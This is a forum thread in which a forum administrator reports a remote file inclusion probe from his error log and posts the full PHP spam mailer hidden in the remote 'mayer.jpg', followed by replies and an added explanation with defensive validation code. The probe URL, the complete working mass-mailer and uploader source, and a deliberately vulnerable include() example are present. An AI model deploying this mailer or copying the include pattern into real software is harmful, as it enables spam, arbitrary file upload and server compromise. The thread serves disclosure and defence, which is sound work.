
Code Injection? (Trojan?)

Started by PowerPyx, May 08, 2006, 10:32:02 AM



PowerPyx


Hi folks,

while parsing the error messages of my forum I found the following:


User: Guest    Yesterday at 01:33:13
IP address: 81.199.58.39
URL: http://www.rad-community.de/ds1test/index.php?page=http://ibank.glwb.info/mayer.jpg?
Database error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://ibank.glwb.info/mayer.jpg? AND off=0 AND approved=1 LIMIT 1' at line 1
File: /var/www/rad-community/htdocs/ds1test/Sources/TPortal.php
Line: 368


I was wondering what the guest wanted to do, so I checked the link and found the following code hidden in the mayer.jpg:


<?
// Mass mailer found in mayer.jpg, as posted. It is PHP 4 era code: $action,
// $message, $subject, $from, $realname, $replyto, $emaillist, $contenttype and the
// $file/$file_name/$file_type upload variables are never read from $_POST, $_GET
// or $_FILES, so the script depends on register_globals to fill them from the
// request. The Spanish strings are the script's own messages and are left as found.

If ($action=="mysql"){
    #Grab email addresses de MySQL
    // Harvest step: mysql.info.php (expected next to the script) has to define
    // $sqlhost, $sqllogin, $sqlpass, $sqldb and $sqlquery; the first column of every
    // row the query returns is appended to $emaillist, one address per line.
    include "./mysql.info.php";
    if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
        print "Porfavor configure su mysql.info.php en tu MySQL informacion. Todas las opciones requeridas.";
        exit;
    }
    $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Conexion en MySQL Fallida.");
    mysql_select_db($sqldb, $db) or die("Seleecione su DataBase $sqldb");
    $result = mysql_query($sqlquery) or die("Secion fallida: $sqlquery");
    $numrows = mysql_num_rows($result);
    for($x=0; $x<$numrows; $x++){
        $result_row = mysql_fetch_row($result);
        $oneemail = $result_row[0];
        $emaillist .= $oneemail."\n";
    }
}

if ($action=="send"){
    // Strip the backslashes that magic_quotes adds to the submitted subject and body.
    $message = urlencode($message);
    $message = ereg_replace("%5C%22", "%22", $message);
    $message = urldecode($message);
    $message = stripslashes($message);
    $subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data">
  <br>
  <table width="100%" border="0">
    <tr>
      <td width="10%">
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
          Mail:</font></div>
      </td>
      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="text" name="from" value="<? print $from; ?>" size="30">
        </font></td>
      <td width="31%">
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your
          Name:</font></div>
      </td>
      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="text" name="realname" value="<? print $realname; ?>" size="30">
        </font></td>
    </tr>
    <tr>
      <td width="10%">
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Repit:</font></div>
      </td>
      <td width="18%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="text" name="replyto" value="<? print $replyto; ?>" size="30">
        </font></td>
      <td width="31%">
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Upload
          Txt:</font></div>
      </td>
      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="file" name="file" size="30">
        </font></td>
    </tr>
    <tr>
      <td width="10%">
        <div align="right"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font></div>
      </td>
      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <input type="text" name="subject" value="<? print $subject; ?>" size="90">
        </font></td>
    </tr>
    <tr valign="top">
      <td colspan="3"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <textarea name="message" cols="60" rows="10"><? print $message; ?></textarea>
        <br>
        <input type="radio" name="contenttype" value="plain">
        Plain
        <input type="radio" name="contenttype" value="html" checked>
        HTML
        <input type="hidden" name="action" value="send">
        <input type="submit" value="Send Emails">
        </font></td>
      <td width="41%"><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
        <textarea name="emaillist" cols="30" rows="10"><? print $emaillist; ?></textarea>
        </font></td>
    </tr>
  </table>
</form>

<?
if ($action=="send"){
    if (!$from && !$subject && !$message && !$emaillist){
        print "Porfavor complete todo lo necesario.";
        exit;
    }

    $allemails = split("\n", $emaillist);
    $numemails = count($allemails);

    #Open the file attachment if any, and base64_encode it for email transport
    // The upload is first copied into the script's own directory under the
    // client-chosen name, so on any host where this runs the mailer doubles as an
    // arbitrary file uploader.
    If ($file_name){
        @copy($file, "./$file_name") or die("El archivo que intestaste subir al servidor, no puede ser copiado");
        $content = fread(fopen($file,"r"),filesize($file));
        $content = chunk_split(base64_encode($content));
        $uid = strtoupper(md5(uniqid(time())));
        $name = basename($file);
    }

    // One mail() call per address. "&email&" in subject and body is replaced with
    // the recipient (in place, so only the first recipient is ever substituted).
    // Body and attachment are smuggled through the headers argument of mail() with
    // an empty message, and the first MIME boundary follows the Content-Type header
    // without the blank line that separates headers from body (as found).
    for($x=0; $x<$numemails; $x++){
        $to = $allemails[$x];
        if ($to){
            $to = ereg_replace(" ", "", $to);
            $message = ereg_replace("&email&", $to, $message);
            $subject = ereg_replace("&email&", $to, $subject);
            print "Sending mail to $to.......";
            flush();
            $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
            $header .= "MIME-Version: 1.0\r\n";
            If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
            If ($file_name) $header .= "--$uid\r\n";
            $header .= "Content-Type: text/$contenttype\r\n";
            $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
            $header .= "$message\r\n";
            If ($file_name) $header .= "--$uid\r\n";
            If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
            If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
            If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
            If ($file_name) $header .= "$content\r\n";
            If ($file_name) $header .= "--$uid--";
            mail($to, $subject, "", $header);
            print "ok<br>";
            flush();
        }
    }
}
?>
<p align="center"><b>Hosted by XGnDX </b></p>


It seems to me that this is an attempt to get all the email addresses out of the SQL database to use them as spam addresses.

Does anybody know this already, or is it completely new?


PowerPyx

IchBin

Not knowing PHP well enough, it seems to me that they're trying to use some type of exploit.

Xarcell

If he had used png, it would have worked.

bloc

At least in TP that will not work. The "page" number compares its value to the id in the database. This routine seems to be trying to make something be executed, like the "page" will contain code of some sort, for example. But sending executable code through GET values is very unsafe, so I don't think anyone does that.

Script kiddie?

Anyway, in TP 0.9 this will also be better filtered. Any non-number calls will simply not happen, just be reported.

IchBin

Quote from: Xarcell on May 09, 2006, 04:09:30 AM
If he had used png, it would have worked.
May I ask what you are talking about, Xarcell? What does the type of graphic have to do with them trying to inject the SQL server with some code?
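The request PowerPyx logged is a remote file inclusion (RFI) probe: the attacker hoped the `page` value would reach an `include()` call, in which case PHP would fetch mayer.jpg over HTTP and run the `<? ... ?>` blocks inside it on the forum's own server. The file name and extension do not matter to `include()`, which is why a "jpg" can carry a mailer; the trailing `?` in the probe is there so that any suffix the script appends to the path becomes a query string and the remote file is served unchanged. In TinyPortal the value ended up in a SQL query instead, which is the syntax error in the log. The following added example, which is neither TinyPortal code nor the script from mayer.jpg, puts the vulnerable pattern next to the numeric id handling bloc describes and a bound query. The table name `tp_pages` and the columns `id`, `title` and `body` are assumptions; `off` and `approved` are the columns visible in the logged query fragment. It runs from the command line with the pdo_sqlite extension.

```php
<?php
// Added example, not TinyPortal code and not the mayer.jpg script. Table tp_pages
// and the columns id, title, body are assumptions; off and approved come from the
// query fragment in the logged error.
declare(strict_types=1);

// 1. The pattern the probe was hunting for. Under register_globals (the PHP 4
//    default) $page comes straight from the query string; with allow_url_fopen on
//    (and allow_url_include on from PHP 5.2) include() fetches the URL over HTTP and
//    executes whatever PHP blocks the response contains. The probe's trailing "?"
//    turns the appended '.php' into a query string, so the remote file is returned
//    as-is. Never deploy this; it is here only for contrast and is never called.
function vulnerable_page_handler(string $page): void
{
    include $page . '.php';   // ?page=http://host/mayer.jpg?  ->  http://host/mayer.jpg?.php
}

// 2. Strict numeric validation: accept only a positive integer, report anything
//    else. is_string() runs first so that page[]=... (an array) is rejected before
//    ctype_digit() ever sees it.
function validated_page_id(array $params): ?int
{
    $raw = $params['page'] ?? '';
    if (!is_string($raw) || $raw === '' || !ctype_digit($raw)) {
        error_log('rejected non-numeric page parameter: ' . var_export($raw, true));
        return null;
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

// 3. Bind the id instead of interpolating it. The logged error shows the raw value
//    landing in the SQL text unquoted; a bound integer parameter cannot become SQL,
//    whatever the client sent.
function fetch_page(PDO $db, int $id): ?array
{
    $stmt = $db->prepare(
        'SELECT id, title, body FROM tp_pages WHERE id = :id AND off = 0 AND approved = 1 LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demonstration against an in-memory SQLite database with constructed sample rows.
function demo(): array
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE tp_pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT, off INTEGER, approved INTEGER)');
    $db->exec("INSERT INTO tp_pages VALUES (3, 'Rules', 'Be nice.', 0, 1), (4, 'Draft', 'Hidden', 0, 0)");

    $probes = [
        ['page' => 'http://ibank.glwb.info/mayer.jpg?'],  // the RFI probe from the log
        ['page' => '3 OR 1=1'],                           // non-numeric, rejected before any SQL is built
        ['page' => '4'],                                  // valid id, but the page is not approved
        ['page' => '3'],                                  // valid, approved page
    ];
    $results = [];
    foreach ($probes as $p) {
        $id = validated_page_id($p);
        if ($id === null) {
            $results[$p['page']] = 'rejected';
            continue;
        }
        $row = fetch_page($db, $id);
        $results[$p['page']] = $row === null ? 'no such page' : $row['title'];
    }
    return $results;
}

if (PHP_SAPI === 'cli') {
    foreach (demo() as $input => $outcome) {
        printf("%-36s => %s\n", $input, $outcome);
    }
}
```

The probe URL and the SQL-shaped string are both refused by `validated_page_id()` before any query exists, id 4 reaches the database but is filtered by the `approved = 1` condition, and only id 3 returns a row. The same check applied to a remote URL is what turns an RFI probe into a log entry rather than a running mailer.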
